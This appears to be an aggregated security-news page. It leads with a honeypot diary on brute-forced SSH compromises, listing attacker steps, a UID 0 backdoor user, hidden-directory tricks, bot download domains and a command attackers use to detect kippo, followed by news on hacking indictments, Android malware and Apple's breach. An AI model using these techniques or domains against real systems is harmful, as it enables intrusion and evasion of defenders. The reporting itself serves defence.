Information Security News
One common and stupidly simple way hosts are compromissed is weak SSH passwords. You would think people have learned by now, but evidently there are still enough systems with root passwords like 12345 around to make scanning for them a worthwhile exercise. As a result, one of my favorite honeypot tools is kippo, and we have talked about the tool before. I figured it is a good time again to write a quick update on some recent compromisses
The basic compromisse tends to follow a basic pattern:
- user logs in as root
- looks a bit around the system (uname -a, cpuinfo and the like)
- sometimes performes a bandwidth test by downloading a large file, for example a Windows service pack.
- the installs some kind of rootkit/backdoor/bot
- sometimes adds a user to the system.
Here are some of the recent artifacts:
- a UID 0 user called "cvsroot" (this user CAN be found on normal systems, but not with a UID of 0)
- the usual "hidden" directory name of many spaces (e.g. cd /var/tmp; mkdir " " )
Here are some of the domains I have seen used to download bots and other tools from:
bnry.jorgee.nu, anglefire.com/komales88, donjoan.go.ro
One particular interesting attacker actually used a little trick to figure out if the system ran kippo, by installing a non-existing package. If the "apt-get" command is used, kippo will always simulate success, even if the packes wouldn't exist. So our enterprising hacker issued the following command:
apt-get install kippofuck
and of course, kippo pretended to install this package. The attacker of course immediatly disconnected.
We are always trying to tweak the ISC website a bit to make it more useful. This week, we moved live a couple new features and are looking for feedback. Note that these features do require you to log in to take advantage of them.
- Our news page got reorganized again. I am not sure if we got it "right" yet, but I think it is now more useable. The goal is to allow users to "rank" news to make the feed overall more relevant. Once you are logged in, you will see a "+1" button to add your weight to an article.
- We made the diary comments a bit more interactive by integrating them with a forum to allow for threaded discussions / quotes and the like. There are now also some generic security categories for other discussions and a section to comment on current news.
For any feedback, please use the comment form.
Five Eastern European men have been charged with operating a global hacking operation that infiltrated some of the world's biggest financial institutions, pilfered data for more than 160 million credit cards, and created hundreds of millions of dollars in losses.
The case, brought by US attorneys in Manhattan and New Jersey, is the largest hacking scheme ever prosecuted in the US, Department of Justice officials said. From 2005 to 2012, the four Russian nationals and a Ukrainian penetrated the private networks of the Nasdaq stock exchange, Citibank, PNC Bank, Heartland Payment Systems, 7-Eleven, JCPenney, Hannaford Brothers, and others, prosecutors alleged in indictments unsealed Thursday morning. The hacking gang traded text strings that exploited SQL-injection vulnerabilities in the victim companies' websites to obtain login credentials and other sensitive data, then installed malware that gave them persistent backdoor access to the networks.
"NASDAQ is owned," Aleksandr Kalinin, a 26-year-old resident of St. Petersburg, Russia, allegedly reported in a January 2008 instant message after finally obtaining administrative access to the stock exchange's network. Like a rock climber slowly scaling a craggy cliff, he spent months methodically escalating his access into the highly sensitive system. In an instant message he sent six months earlier, after initially gaining less-privileged access, he said, "30 SQL servers, and we can run whatever on them, already cracked admin PWS but the network not viewable yet. those dbs are hell big and I think most of info is trading histories." "PWS" and "dbs" are presumed to be shorthand for passwords and databases respectively.
A man who has won about $1.5 million in poker tournaments has been arrested and charged with running an operation that combined spam, Android malware, and a fake dating website to scam victims out of $3.9 million, according to Symantec.
Symantec worked with investigators from the Chiba Prefectural Police in Japan, who earlier this week "arrested nine individuals for distributing spam that included e-mails with links to download Android.Enesoluty—a malware used to collect contact details stored on the owner’s device," Symantec wrote in its blog.
Android.Enesoluty is a Trojan distributed as an Android application file. It steals information and sends it to computers run by hackers. It was discovered by security researchers in September 2012.
How technical monitoring can help defend against insider threats
For more information regarding insider threats and network security, check out the CCNA security course offered by the InfoSec Institute. Remember that every employee has the ability to be an insider threat. The most impactful threats are caused by ...
Closing Arguments in Bradley Manning's Trial (Live Updates)
Major Fein: The government must hold Manning ”accountable for exact training he gave others on this subject matter” (Manning produced presentation on infosec). Fein continued: Manning was a “trained analyst who understood how to assess the enemy and ...
by Andrew Cunningham
A week after its developer site was accessed by an "intruder," Apple has posted another update about its ongoing process to secure the systems and get them back online. While most of the systems remain down, the update specifies the order in which the services will be resuscitated.
"We plan to roll out our updated systems, starting with Certificates, Identifiers & Profiles, Apple Developer Forums, Bug Reporter, pre-release developer libraries, and videos first," said the update. "Next, we will restore software downloads so that the latest betas of iOS 7, Xcode 5, and OS X Mavericks will once again be available to program members. We’ll then bring the remaining systems online."
Developers interested in tracking Apple's progress can also visit a new system status page, which will be updated as the affected services are brought back up. As of this writing, only two systems—iTunes Connect and the Apple Bug Reporter system—are reportedly up, but the others should follow in the coming days.
Infosec volver a marcar el mes de la ciberseguridad
Pysn Pueblo y Sociedad Noticias
largo de la semana, entre el 7 y 11 de octubre, tendrá lugar en las iniciativas integradas INFOSEC semana. . El 7 y 11 de octubre allí para ver una serie de intervenciones con conexión. De lunes a viernes también dará lugar a una serie de talleres ...
Infosec volta a assinalar mês da cibersegurança
A terceira edição do InfoSec Day decorre na Universidade Lusófona em Lisboa. As inscrições para assistir às intervenções que compõem o evento já estão abertas, tal como as inscrições para a formação ModSecurity, que decorre nos dias 7 e 8 de outubro ...
Posted by InfoSec News on Jul 25http://www.timesofisrael.com/learning-the-art-and-practice-of-cyber-defense/
Posted by InfoSec News on Jul 25http://arstechnica.com/security/2013/07/google-strengthens-android-security-muscle-with-nsa-developed-protection/
Posted by InfoSec News on Jul 25http://freebeacon.com/edward-snowden-seeking-to-join-kgb-veterans-group/